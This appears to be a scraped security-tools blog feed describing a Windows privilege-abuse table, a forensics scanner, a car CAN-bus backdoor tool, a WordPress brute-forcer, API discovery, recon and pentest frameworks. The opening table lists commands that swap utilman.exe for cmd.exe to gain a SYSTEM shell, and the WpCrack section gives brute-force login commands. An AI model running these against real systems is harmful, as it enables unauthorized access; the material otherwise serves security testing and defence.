- Sometimes the name of the privilege uses uppercase "T" and is referred as SeSystemTime.
SeTakeOwnershipAdminBuilt-in commands1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeTcbAdmin3rd party toolManipulate tokens to have local admin rights included.Sample code+exe creating arbitrary tokens to be found at PsBits.
SeTimeZoneMessBuilt-in commandsChange the timezone. tzutil /s "Chatham Islands Standard Time"
SeTrustedCredManAccess???
SeUndockNone--The privilege is enabled when undocking, but never observed it checked to grant/deny access. In practice it means it is actually unused and cannot lead to any escalation.
SeUnsolicitedInputNone--The privilege is not used in the Windows OS.

Credits:



Judge-Jury-and-Executable - A File System Forensics Analysis Scanner And Threat Hunting Tool

$
0
0


Features:
  • Scan a mounted filesystem for threats right away
  • Or gather a system baseline before an incident, for extra threat hunting ability
  • Can be used before, during or after an incident
  • For one to many workstations
  • Scans the MFT, bypassing file permissions, file locks or OS file protections/hiding/shadowing
  • Up to 51 different properties gathered for every file
  • Scan results go into an SQL table for later searching, aggregating results over many scans and/or many machines, and historical or retrospective analysis
  • Leverage the power of SQL to search file systems, query file properties, answer complex or high-level questions, and hunt for threats or indicators of compromise

Requirements:
  • .NET Framework v4.8
  • Local or remote SQL database with read/write/create access.
  • Visual studio (if you wish to compile the C# code)
  • Access to the internet (or else how did you get this code??? Also for nuget packages...)
  • Basic knowlege of SQL

Hunt for viruses, malware, and APTs on (multiple) file systems using by writing queries in SQL.

Allow me to elaborate...

You start with a disk or disk images that are potentially dirty with malware, viruses, APT's (advanced persistent threats) or the like, and then scan them with this tool. (Optionally, and assuming you have the wisdom and foresight to do so, you may wish to scan a known good baseline disk image with this tool first (or later--doesn't matter). This is certainly not necessary, but can only serve to aid you.) The forensics-level scanning portion of this tool collects a bunch of properties about each file in a file system (or an image(s) of one), and places these properties in a SQL relational database table. The secret sauce comes from being able to threat hunt, investigate, or ask questions about the data through the use of queries, in the language of SQL, against the database that is created. A key feature here was NOT inventing a proprietary query language. If you know SQL, and how to click a button, then you already know how to use this tool like a boss. Even if you don't, this concept is powerful enough that canned queries (see below) will get you a lot of mileage.


Forensics-level scanning.

Firstly, the tool creates an entry in the database for each record found in the MFT (master file table--its how NTFS does its record keeping). This bypasses file security permissions, file hiding, stealth or obfuscation techniques, file deletion, or timestamp tampering. These techniques will not prevent the file from being scanned and catalogued. The bytes of the file are read from the MFT and as many data points as possible are taken from the bytes of the file read from the MFT before attempting to access any data points using the higher-level OS API calls.


Rich, high-level data analytics.

After the MFT and forensics-level data is secured, operating-system-level properties, data and meta-data available about each file is collected and augments each entry created from the MFT entry. As a result of this, even if the file or its properties from the Operating System API or the dotnet framework cannot be accessed due to file permissions (ACL), file locks (is in use), disk corruption, a zero-byte-length file, or any of the various other reasons, the file's existence will still be recorded, logged and tracked. The entry, however, will simply not contain the information about it that was not accessible to the operating system. Up to 51 different data points may be collected for every file.



For each file, information collected includes:
  • SHA256 hash
  • MD5 hash
  • Import table hash (if it exists)
  • MFT Number & Sequence Number
  • MFT Create/Modified/Accessed Dates
  • Create/Modified/Accessed Dates Reported by OS
  • All the 'Standard' OS file properties: location, size, datestamps, attributes, metadata
  • Is a PE or DLL or Driver?
  • Is Authenticode signed?
  • Does the X.509 certificate chain verify?
  • Custom YARA rules (Lists the rule names that match)
  • File entropy
  • File entropy
  • Up to 51 different data points in total

Canned Queries:
/*
IDEA: All files in the directory C:\Windows\System32\ should be 'owned' by TrustedInstaller.
If a file in the System32 directory is owned by a different user, this indicates an anomaly,
and that user is likely the user that created that file.
Malware likes to masquerade around as valid Windows system files.
Executables that are placed in the System32 directory not only look more official, as it is a common path for
system files, but an explicit path to that executable does not need to be supplied to execute it from the
command line, windows 'Run' dialog box of the start menu, or the win32 API call ShellExecute.
*/

SELECT
TOP 1000 *
FROM [FileProperties]
WHERE
[FileOwner] <> 'TrustedInstaller'
AND [DirectoryLocation] = ':\Windows\System32'
AND IsSigned = 0
ORDER BY [PrevalenceCount] DESC


/*
IDEA: The MFT creation timestamp and the OS creation timestamp sh ould match.
If the MFT creation timestamp occurs after the creation time reported by the OS meta-data,
this indicates an anomaly.
Timestomp is a tool that is part of the Metasploit Framework that allows a user to backdate a file
to an arbitrary time of their choosing. There really isn't a good legitimate reason for doing this
(let me know if you can think of one), and is considered an anti-forensics technique.
*/

SELECT
TOP 1000 *
FROM [FileProperties]
WHERE
([MftTimeAccessed] <> [LastAccessTime]) OR
([MftTimeCreation] <> [CreationTime]) OR
([MftTimeMftModified] <> [LastWriteTime])
ORDER BY [DateSeen] DESC

/*
IDEA: The 'CompileDate' property of any executable or dll should always come before the creation timestamp for that file.
Similar logic applies as for the MFT creation timestamp occuring after the creation timestamp. How could a program have been
compiled AFTER the file that holds it was created? This anomaly indicates backdating or timestomping has occurred.
*/


SELECT
TOP 1000 *
FROM [FileProperties]
WHERE
([MftTimeCreation] < [CompileDate]) OR
([CreationTime] < [CompileDate])
ORDER BY [DateSeen] DESC



CANalyse - A Vehicle Network Analysis And Attack Tool

$
0
0


CANalyse is a tool built to analyze the log files to find out unique datasets automatically and able to connect to simple user interfaces such as Telegram. Basically, while using this tool the attacker can provide a bot-ID and use the tool over the internet through telegram-bot. CANalyse is made to be placed inside a raspberry-PI and able to exploit the vehicle through a telegram bot by recording and analysing the network traffic/data logs, like a hardware backdoor planted in a car.

A prerequisite to using this tool is that the Hardware implant is already installed in the car and capable of communicating with the Network/communication channels inside the vehicle.


Explained here

Tool Layout


Requirements:

Installation of CANalyse:
git clone https://github.com/KartheekLade/CANalyse.git
cd CANalyse
pip3 install -r requirements.txt

Usage
cd CANalyse/
python3 canalyse_tool.py

Troubleshooting
  • If the tool dumps "No such device" error or you can't view any traffic, check if the interface & communication channel in settings.
  • if the auto installation of required libraries didn't work try running with sudo once or install them manually.
  • If you are not able to execute commands properly, do check the " menu ".

Next Updates (In process)
  • A secondary refinery proccess to get more concentrated payload, which will be optional to users.
  • Making a common settings in CLI and Bot.
  • Ability to record and download multiple files.

Note:
  • Code is constantly being updated for fixing the bugs, Errorhandling and smooth experience. If you face any problems send a DM or raise a issue, We (I and the contributors) will be happy to help as much as we can.
  • Thanks to developers who created python-can and other libraries used in this tool.

Warning
  • This tool is purely for learning and educational purposes only. I and the contributors are not responsibale for any harmful actions.
  • Don't Use/Share your Public bot Name/ID, it's advised to use a random name.


WordPress-Brute-Force - Super Fast Login WordPress Brute Force

$
0
0


WordPress Brute Force Super Fast Login

      .---.        .-----------
/ \ __ / ------
/ / \( )/ -----
////// ' \/ ` ---
//// / // : ★★ : ---
// / / /` '--
// //..\ WpCrack Brute Froce Tool™
====UU====UU==========================
'//||\`
''``
usage: python WpCrack.py [options]
optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
-d, --debug debugging mode

target arguments:
-t , --target url of the target
-u , --username username of the target (default: admin)
-p , --password password of the target (change -p to --p to use a wordlist)

--timeout timed out for requests
--thread numbe rs of threading multiproccesor (default: 5)
--proxy using a HTTP proxy (ex: http://site.com:8000)

Copyright © 2021 Andrew - Powered by Indonesian Darknet

How To Use

Using a single password

python WpCrack.py -t http://site.com/wp-login.php -u admin -p password

Using a multiple password / wordlist

python WpCrack.py -t http://site.com/wp-login.php -u admin --p wordlist.txt

About

WpCrack is a tool used to force login into the WordPress CMS web application and is built in the Python programming language


Features
  • Very fast login
  • Use of HTTP proxies
  • Multithreading or Multiprocessor


Red-Detector - Scan Your EC2 Instance To Find Its Vulnerabilities Using Vuls.io

$
0
0


Scan your EC2 instance to find its vulnerabilities using Vuls (https://vuls.io/en/).

Audit your EC2 instance to find security misconfigurations using Lynis (https://cisofy.com/solutions/#lynis).

Scan your EC2 instance for signs of a rootkit using Chkrootkit (http://www.chkrootkit.org/). 




Requirements
  1. Configured AWS account with the EC2 actions mentioned below. The policy containing these requirements can be found in red-detector-policy.json.

Actions details:

Required action premissionWhy it is required
"AttachVolume"Enables attaching the volume with the taken snapshot to the EC2 instance that is being used for the vulnerabilities scan.
"AuthorizeSecurityGroupIngress"Enables attaching security group to the EC2 instance. Contains IP premmisions to ssh port and a random port generated for the scan UI access.
"DescribeInstances"Enables access to the clients EC2 instances details.
"CreateKeyPair"Enables the creation of a key pair that is being used as the key of the EC2 instance.
"CreateTags"Enabled the creation of Tags on the Volume and Snapshot.
"DescribeRegions"Enables access to the clients active regions to enable the user select the relevant one for the scan.
"RunInstances"Enables the creation of an EC2 instance under the users client.
"ReportInstanceStatus"Enables getting the current status of the created EC2 instance to make sure it is running.
"DescribeSnapshots"Enables getting the current status of the taken snapshot to make sure it is available.
"DescribeImages"Enables querying AMI's to get the latest Ubuntu AMI.
"DescribeVolumeStatus"Enables getting the current status of the volume being created.
"DescribeVolumes"Enables getting details about a volume.
"CreateVolume"Enables the creation of a volume, in order to attach it the taken snapshot and attach it to the EC2 instance used for the vulnerabilities scan.
"DescribeAvailabilityZones"Enables access to the clients active availability zones to select one for the created volume that is being attach to the EC2 instance.
"DescribeVpcs"Enables getting the clients default vpc. Used for the EC2s security group generation.
"CreateSecurityGroup"Enables the creation of a security group that is being attached to the EC2 instance.
"CreateSnapshot"Enables taking a snapshot. Used to take a snapshot of the chosen EC2 instance.
"DeleteSnapshot"Enables deleting the stale snapshot was created during the process
  1. Running EC2 instance - Make sure you know the region and instance id of the EC2 instance you would like to scan. Supported versions:
    • Ubuntu: 14, 16, 18, 19, 20
    • Debian: 6, 8, 9
    • Redhat: 7, 8
    • Suse: 12
    • Amazon: 2
    • Oracle: 8

Installation
sudo git clone https://github.com/lightspin-tech/red-detector.git
pip3 install -r requirements.txt

Usage

Interactive
python3 main.py

Command arguments
usage: main.py [-h] [--region REGION] [--instance-id INSTANCE_ID] [--keypair KEYPAIR] [--log-level LOG_LEVEL]

optional arguments:
-h, --help show this help message and exit
--region REGION region name
--instance-id INSTANCE_ID EC2 instance id
--keypair KEYPAIR existing key pair name
--log-level LOG_LEVEL log level

Flow
  1. Run main.py.
  2. Region selection: use default region (us-east-1) or select a region. Notice that if the selected region does not contain any EC2 instances you will be asked to choose another region.
  3. EC2 inatance-id selection: you will get a list of all EC2 instances ids under your selected region and you will be asked to choose the inatance you would like to scan. Make sure to choose a valide answer (the number left to the desired id).
  4. Track the process progress... It takes about 30 minutes.
  5. Get a link to your report!

Troubleshooting

verbouse logging

python3 main.py --log-level DEBUG


scanners databases update process
  1. connect to the EC2 instance created ssh ubuntu@PUBLICIP -i KEYPAIR.pem
  2. watch the progress tail /var/log/user-data.log


Kiterunner - Contextual Content Discovery Tool

$
0
0


For the longest of times, content discovery has been focused on finding files and folders. While this approach is effective for legacy web servers that host static files or respond with 3xx’s upon a partial path, it is no longer effective for modern web applications, specifically APIs.

Over time, we have seen a lot of time invested in making content discovery tools faster so that larger wordlists can be used, however the art of content discovery has not been innovated upon.

Kiterunner is a tool that is capable of not only performing traditional content discovery at lightning fast speeds, but also bruteforcing routes/endpoints in modern applications.

Modern application frameworks such as Flask, Rails, Express, Django and others follow the paradigm of explicitly defining routes which expect certain HTTP methods, headers, parameters and values.

When using traditional content discovery tooling, such routes are often missed and cannot easily be discovered.

By collating a dataset of Swagger specifications and condensing it into our own schema, Kiterunner can use this dataset to bruteforce API endpoints by sending the correct HTTP method, headers, path, parameters and values for each request it sends.

Swagger files were collected from a number of datasources, including an internet wide scan for the 40+ most common swagger paths. Other datasources included GitHub via BigQuery, and APIs.guru.


Installation

Downloading a release

You can download a pre-built copy from https://github.com/assetnote/kiterunner/releases.


Building from source
# build the binary
make build

# symlink your binary
ln -s $(pwd)/dist/kr /usr/local/bin/kr

# compile the wordlist
# kr kb compile <input.json> <output.kite>
kr kb compile routes.json routes.kite

# scan away
kr scan hosts.txt -w routes.kite -x 20 -j 100 --ignore-length=1053

The JSON datasets can be found below:

Alternatively, it is possible to download the compile .kite files from the links below:


Usage

Quick Start
kr [scan|brute] <input> [flags]
  • <input> can be a file, a domain, or URI. we'll figure it out for you. See Input/Host Formatting for more details
# Just have a list of hosts and no wordlist
kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411

# You have your own wordlist but you want assetnote wordlists too
kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411

# Bruteforce like normal but with the first 20000 words
kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1

# Use a dirsearch style wordlist with %EXT%
kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D

CLI Help
Usage:
kite scan [flags]

Flags:
-A, --assetnote-wordlist strings use the wordlists from wordlist.assetnote.io. specify the type/name to use, e.g. apiroutes-210228. You can specify an additional maxlength to use only the first N values in the wordlist, e.g. apiroutes-210228;20000 will only use the first 20000 lines in that wordlist
--blacklist-domain strings domains that are blacklisted for redirects. We will not follow redirects to these domains
--delay duration delay to place inbetween requests to a single host
--disable-precheck whether to skip host discovery
--fail-status-codes ints which status codes blacklist as fail. if this is set, this will override success-status-codes
--filter-api strings only scan apis matching this ksuid
--force-method string whether to ignore the methods specified in the ogl file and force this method
-H, --header strings headers to add to requests (default [x-forwarded-for: 127.0.0.1])
-h, --help help for scan
--ignore-length strings a range of content length bytes to ignore. you can have multiple. e.g. 100-105 or 1234 or 123,34-53. This is inclusive on both ends
--kitebuilder-full-scan perform a full scan without first performing a phase scan.
-w, --kitebuilder-list strings ogl wordlist to use for scanning
-x, --max-connection-per-host int max connections to a single host (default 3)
-j, --max-parallel-hosts int max number of concurrent hosts to scan at once (default 50)
--max-redirects int maximum number of redirects to follow (default 3)
-d, --preflight-depth int when performing preflight checks, what directory depth do we attempt to check. 0 means that only the docroot is checked (default 1)
--profile-name st ring name for profile output file
--progress a progress bar while scanning. by default enabled only on Stderr (default true)
--quarantine-threshold int if the host return N consecutive hits, we quarantine the host as wildcard. Set to 0 to disable (default 10)
--success-status-codes ints which status codes whitelist as success. this is the default mode
-t, --timeout duration timeout to use on all requests (default 3s)
--user-agent string user agent to use for requests (default "Chrome. Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36")
--wildcard-detection can be set to false to disable wildcard redirect detection (default true)

Global Flags:
--config string config file (default is $HOME/.kiterunner.yaml)
-o, --output string output format. can be json,t ext,pretty (default "pretty")
-q, --quiet quiet mode. will mute unecessarry pretty text
-v, --verbose string level of logging verbosity. can be error,info,debug,trace (default "info")

bruteforce flags (all the flags above +)

  -D, --dirsearch-compat              this will replace %EXT% with the extensions provided. backwards compat with dirsearch because shubs loves him some dirsearch
-e, --extensions strings extensions to append while scanning
-w, --wordlist strings normal wordlist to use for scanning

Input/Host Formatting

When supplied with an input, kiterunner will attempt to resolve the input in the following order:

  1. Is the input a file. If so read all the lines in the file as separate domains
  2. The input is treated as a "domain"

If you supply a "domain", but it exists as a file, e.g. google.com but google.com is also a txt file in the current directory, we'll load google.com the text file, because we found it first.

Domain Parsing

Its preferred that you provide a full URI as the input, however you can provide incomplete URIs and we'll try and guess what you mean. An example list of domains you can supply are:

one.com
two.com:80
three.com:443
four.com:9447
https://five.com:9090
http://six.com:80/api

The above list of domains will expand into the subsequent list of targets

(two targets are created for one.com, since neither port nor protocol was specified)
http://one.com (port 80 implied)
https://one.com (port 443 implied)

http://two.com (port 80 implied)
https://three.com (port 443 implied)
http://four.com:9447 (non-tls port guessed)
https://five.com:9090
http://six.com/api (port 80 implied; basepath API appended)

the rules we apply are:

  • if you supply a scheme, we use the scheme.
    • We only support http & https
    • if you don't supply a scheme, we'll guess based on the port
  • if you supply a port, we'll use the port
    • If your port is 443, or 8443, we'll assume its tls
    • if you don't supply a port, we'll guess both port 80, 443
  • if you supply a path, we'll prepend that path to all requests against that host

API Scanning

When you have a single target

# single target
kr scan https://target.com:8443/ -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34

# single target, but you want to try http and https
kr scan target.com -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34

# a list of targets
kr scan targets.txt -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34

Vanilla Bruteforcing
kr brute https://target.com -A=raft-large-words -A=apiroutes-210228:20000 -x 10 -d=0 --ignore-length=34 -ejson,txt

Dirsearch Bruteforcing

For when you have an old-school wordlist that still has %EXT% in the wordlist, you can use -D. this will only substitute the extension where %EXT% is present in the path

kr brute https://target.com -w dirsearch.txt -x 10 -d=0 --ignore-length=34 -ejson,txt -D

Technical Features

Depth Scanning

A key feature of kiterunner is depth based scanning. This attempts to handle detecting wildcards given virtual application path based routing. The depth defines how many directories deep the baseline checks are performed E.g.

~/kiterunner $ cat wordlist.txt

/api/v1/user/create
/api/v1/user/delete
/api/v2/user/
/api/v2/admin/
/secrets/v1/
/secrets/v2/
  • At depth 0, only / would have the baseline checks performed for wildcard detection
  • At depth 1, /api and /secrets would have baseline checks performed; and these checks would be used against /api and /secrets correspondingly
  • At depth 2, /api/v1, /api/v2, /secrets/v1 and /secrets/v2 would all have baseline checks performed.

By default, kr scan has a depth of 1, since from internal usage, we've often seen this as the most common depth where virtual routing has occured. kr brute has a default depth of 0, as you typically don't want this check to be performed with a static wordlist.

Naturally, increasing the depth will increase the accuracy of your scans, however this also increases the number of requests to the target. (# of baseline checks * # of depth baseline directories). Hence, we recommend against going above 1, and in rare cases going to depth 2.


Using Assetnote Wordlists

We provide inbuilt downloading and caching of wordlists from assetnote.io. You can use these with the -A flag which receives a comma delimited list of aliases, or fullnames.

You can get a full list of all the Assetnote wordlists with kr wordlist list.

The wordlists when used, are cached in ~/.cache/kiterunner/wordlists. When used, these are compiled from .txt -> .kite

+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+
| ALIAS | FILENAME | SOURCE | COUNT | FILESIZE | CACHED |
+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+
| 2m-subdomains | 2m-subdomains.txt | manual.json | 2167059 | 28.0mb | false |
| asp_lowercase | asp_lowercase.txt | manual.json | 24074 | 1.1mb | false |
| aspx_lowercase | aspx_lowercase.txt | manual.json | 80293 | 4.4mb | false |
| bak | bak.txt | manual.json | 3172 5 | 634.8kb | false |
| best-dns-wordlist | best-dns-wordlist.txt | manual.json | 9996122 | 139.0mb | false |
| cfm | cfm.txt | manual.json | 12100 | 260.3kb | true |
| do | do.txt | manual.json | 173152 | 4.8mb | false |
| dot_filenames | dot_filenames.txt | manual.json | 3191712 | 71.3mb | false |
| html | html.txt | manual.json | 4227526 | 107.7mb | false |
| apiroutes-201120 | httparchive_apiroutes_2020_11_20.txt | automated.json | 953011 | 45.3mb | false |
| apiroutes-210128 | httparchive_apiroutes_2021_01_28.txt | autom ated.json | 225456 | 6.6mb | false |
| apiroutes-210228 | httparchive_apiroutes_2021_02_28.txt | automated.json | 223544 | 6.5mb | true |
| apiroutes-210328 | httparchive_apiroutes_2021_03_28.txt | automated.json | 215114 | 6.3mb | false |
| aspx-201118 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2020_11_18.txt | automated.json | 63200 | 1.7mb | false |
| aspx-210128 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_01_28.txt | automated.json | 46286 | 928.7kb | false |
| aspx-210228 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_02_28.txt | automated.json | 43958 | 883.3kb | false |
| aspx-210328 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_03_28.txt | automated.json | 45928 | 926.8kb | false |
| cgi-201118 | httparchive_cgi_pl_2020_11_18.txt | automated.json | 2637 | 44.0kb | false |

<SNIP>

Usage

kr scan targets.txt -A=apiroutes-210228 -x 10 --ignore-length=34
kr brute targets.txt -A=aspx-210228 -x 10 --ignore-length=34 -easp,aspx

Head Syntax

When using assetnote provided wordlists, you may not want to use the entire wordlist, so you can opt to use the first N lines in a given wordlist using the head syntax. The format is <wordlist_name>:<N lines> when specifying a wordlist.

Usage

# this will use the first 20000 lines in the api routes wordlist
kr scan targets.txt -A=apiroutes-210228:20000 -x 10 --ignore-length=34

# this will use the first 10 lines in the aspx wordlist
kr brute targets.txt -A=aspx-210228:10 -x 10 --ignore-length=34 -easp,aspx

Concurrency Settings/Going Fast

Kiterunner is made to go fast on a lot of hosts. But, just because you can run kiterunner at 20000 goroutines, doesn't mean its a good idea. Bottlenecks and performance degredation will occur at high thread counts due to more time spent scheduling goroutines that are waiting on network IO and kernel context switching.

There are two main concurrency settings for kiterunner:

  • -x, --max-connection-per-host - maximum number of open connections we can have on a host. Governed by 1 goroutine each. To avoid DOS'ing a host, we recommend keeping this in a low realm of 5-10. Depending on latency to the target, this will yield on average between 1-5 requests per second per connection (200ms - 1000ms/req) to a host.
  • -j, --max-parallel-hosts - maximum number of hosts to scan at any given time. Governed by 1 goroutine supervisor for each

Depending on the hardware you are scanning from, the "maximum" number of goroutines you can run optimally will vary. On an AWS t3.medium, we saw performance degradation going over 2500 goroutines. Meaning, 500 hosts x 5 conn per host (2500) would yield peak performance.

We recommend against running kiterunner from your macbook. Due to poor kernel optimisations for high IO counts and Epoll syscalls on macOS, we noticed substantially poorer (0.3-0.5x) performance when compared to running kiterunner on a similarly configured linux instance.

To maximise performance when scanning an individual target, or a large attack surface we recommend the following tips:

  • Spin up an EC2 instance in a similar geographic region/datacenter to the target(s) you are scanning
  • Perform some initial benchmarks against your target set with varying -x and -j options. We recommend having a typical starting point of around -x 5 -j 100 and moving -j upwards as your CPU usage/network performance permits

Converting between file formats

Kiterunner will also let you convert between the schema JSON, a kite file and a standard txt wordlist.

Usage

The format is decided by the filetype extension supplied by the <input> and <output> fields. We support txt, json and kite

kr kb convert wordlist.txt wordlist.kite
kr kb convert wordlist.kite wordlist.json
kr kb convert wordlist.kite wordlist.txt
❯ go run ./cmd/kiterunner kb convert -qh
convert an input file format into the specified output file format

this will determine the conversion based on the extensions of the input and the output
we support the following filetypes: txt, json, kite
You can convert any of the following into the corresponding types

-d Debug mode will attempt to convert the schema with error handling
-v=debug Debug verbosity will print out the errors for the schema

Usage:
kite kb convert <input> <output> [flags]

Flags:
-d, --debug debug the parsing
-h, --help help for convert

Global Flags:
--config string config file (default is $HOME/.kiterunner.yaml)
-o, --output string output format. can be json,text,pretty (default "pretty")
-q, --quiet quiet mode. will mute unecessarry pretty text
-v, --verbose string level of logging verbosity. can be error,info,debug,trace ( default "info")``bigquery

Replaying requests

When you receive a bunch of output from kiterunner, it may be difficult to immediately understand why a request is causing a specific response code/length. Kiterunner offers a method of rebuilding the request from the wordlists used including all the header and body parameters.

  • You can replay a request by copy pasting the full response output into the kb replay command.
  • You can specify a --proxy to forward your requests through, so you can modify/repeat/intercept the request using 3rd party tools if you wish
  • The golang net/http client will perform a few additional changes to your request due to how the default golang spec implementation (unfortunately).
❯ go run ./cmd/kiterunner kb replay -q --proxy=http://localhost:8080 -w routes.kite "POST    403 [    287,   10,   1] https://target.com/dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents 0cc39f76702ea287ec3e93f4b4710db9c8a86251"
11:25AM INF Raw reconstructed request
POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1
Content-Type: any


11:25AM INF Outbound request
POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1
Host: target.com
User-Agent: Go-http-client/1.1
Content-Length: 0
Content-Type: any
Accept-Encoding: gzip


11:25AM INF Response After Redirects
HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 45
Content-Type: application/json
Date: Wed, 07 Apr 2021 01:25:28 GMT
X-Amzn-Requestid: 7e6b2ea1-c662-4671-9eaa-e8cd31b463f2

User is not authorized to perform this action

Technical Implementation

Intermediate Data Type (PRoutes)

We use an intermediate representation of wordlists and kitebuilder json schemas in kiterunner. This is to allow us to dynamically generate the fields in the wordlist and reconstruct request bodies/headers and query parameters from a given spec.

The PRoute type is composed of Headers, Body, Query and Cookie parameters that are encoded in pkg/proute.Crumb. The Crumb type is an interface that is implemented on types such as UUIDs, Floats, Ints, Random Strings, etc.

When performing conversions to and from txt, json and kite files, all the conversions are first done to the proute.API intermediate type. Then the corresponding encoding is written out


Kite File Format

We use a super secret kite file format for storing the json schemas from kitebuilder. These are simply protobuf encoded pkg/proute.APIS written to a file. The compilation is used to allow us to quickly deserialize the already parsed wordlist. This file format is not stable, and should only be interacted with using the inbuilt conversion tools for kiterunner.

When a new version of the kite file format is released, you may need to recompile your kite files




Waybackurls - Fetch All The URLs That The Wayback Machine Knows About For A Domain

$
0
0


Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for *.domain and output them on stdout.

Usage example:

▶ cat domains.txt | waybackurls> urls

Install:

▶ go get github.com/tomnomnom/waybackurls


Credit

This tool was inspired by @mhmdiaa's waybackurls.py script. Thanks to them for the great idea!



Lucifer - A Powerful Penetration Tool For Automating Penetration Tasks Such As Local Privilege Escalation, Enumeration, Exfiltration And More...

$
0
0


A Powerful Penetration Tool For Automating Penetration Tasks Such As Local Privilege Escalation, Enumeration, Exfiltration and More... Use Or Build Automation Modules To Speed Up Your Cyber Security Life

Setup
git clone https://github.com/Skiller9090/Lucifer.git
cd Lucifer
pip install -r requirements.txt
python main.py --help

If you want the cutting edge changes add -b dev to the end of git clone https://github.com/Skiller9090/Lucifer.git


Commands
CommandDescription
helpDisplays This Menu
nameShows name of current shell
idDisplays current shell's id
showShows options or modules based on input, EX: show <options/modules>
optionsShows a list of variable/options already set
setSets a variable or option, EX: set
set_varsAuto sets need variables for loaded module
descriptionDisplays description of the module loaded
auto_varsDisplays is auto_vars is True or False for current shell
change_auto_varsChanges the auto_var options for one shell, all shells or future shells
reindexRe-indexes all modules, allows for dynamic additions of modules
useMove into a module, EX: use
runRuns the current module, can also use exploit to do the same
spawn_shellSpawns a alternative shell
open_shellOpen a shell by id EX: open_shell
show_shellsShow all shell ids and attached name
set_nameSets current shells name EX: set_name
set_name_idSet a shells name by id EX: set_name_id
clearClear screen
closeKills current input into opened shell
resetResets Everything
exitExits the program, can also use quit to do the same

Command Use
  • No-Arg Commands
    • help - to display help menu

    • name - shows name of current shell

    • id - shows current shell id

    • options - shows a table of set options/vars

    • set_vars - automatically sets vars needed for the loaded module (default defined in a module)

    • description - show description of current loaded module

    • auto_vars - displays current setting of auto_vars (auto_vars if true will automatically run set_vars on module load)

    • run - runs the module with the current options, exploit works the same

    • spawn_shell - spawns a new Shell instance

    • show_shells - shows all open shells ids and names

    • clear - clears the terminal/console screen

    • close - kills the input to current shell

    • reset - resets everything (not implemented)

    • exit - quits the program

  • Arg Commands
    • show <options/modules> - displays a list of set options or modules depending on argument.

    • set <var_name> <value> - sets a variable/option

    • change_auto_vars <to_set> <args>:

      • <to_set> - can be true or false (t or f) (-t or -f)

      • <args>:

        • -g = global - sets for all shells spawned

        • -n = new - sets this option for future shell spawns

        • -i = inclusive - no matter what, set current shell to <to_set>

    • use <module> <args>:

      • <module> - path to module

      • <args>:

        • -R - Override cache (reload dynamically)
    • open_shell <id> - opens a shell by its id

    • set_name <name> - set the name of the current shell

    • set_name_id <id> <name> - set the name of the shell specified by


Using Java

Lucifer allows for Python and Java code to work side by side through the use of LMI.Java extension. For this to work you will need to install jpype1, to do this run the following command in your python environment:
pip install jpype1
>From here you are free to interact with LMI.Java.compiler and LMI.Java.luciferJVM which allows you to call java functions and instantiate java classes through python, more documentation of this will be created later on, on the lucifer wiki.


Examples

Settings Variables



Running Module



Settings



Versioning

The standard of versioning on this project is:


MAJOR.MINOR.PATCH.STAGE.BUILD

Major:
  • incremented when either there has been a significant amount of new features since the start of the major or if there is a change which is so big that is can cause compatibility issues (Major of 0 if very unstable
  • Could cause incompatibility issues

Minor:
  • incremented when a new feature or feature-set is added to the project
  • should not cause incompatibility errors due to only additions made

Patch:
  • incremented on bugfixes or if feature is so small that it is worth incrementing minor
  • very low risk of incompatibility error

Stage:
  • The stage of current MAJOR.MINOR.PATCH BUILD, either alpha, beta, release candidate or release
  • Indicates how far through development the new MAJOR.MINOR.PATCH is
  • Stage number to name translation:
    • 0 => beta (b)
    • 1 => alpha (a)
    • 2 => release candidate (rc)
    • 3 => release (r)

Build:
  • this should be incremented on every change made to the code, even on a one character change

This version structure can be stored and displayed in a few ways:

  • The best way to store the data within code is via a tuple such as:
    • (Major, Minor, Patch, Stage, Build)
      • Example is: (1, 4, 1, 2, 331)
  • The long display would be:
    • {stage} {major}.{minor}.{patch} Build {build}
      • Example is: Alpha 1.4.1 Build 331
  • The short display would be:
    • {major}.{minor}.{patch}{stage}{build}
      • Example is: 1.4.1a331


CyberBattleSim - An Experimentation And Research Platform To Investigate The Interaction Of Automated Agents In An Abstract Simulated Network Environments

$
0
0


CyberBattleSim is an experimentation research platform to investigate the interaction of automated agents operating in a simulated abstract enterprise network environment. The simulation provides a high-level abstraction of computer networks and cyber security concepts. Its Python-based Open AI Gym interface allows for training of automated agents using reinforcement learning algorithms.

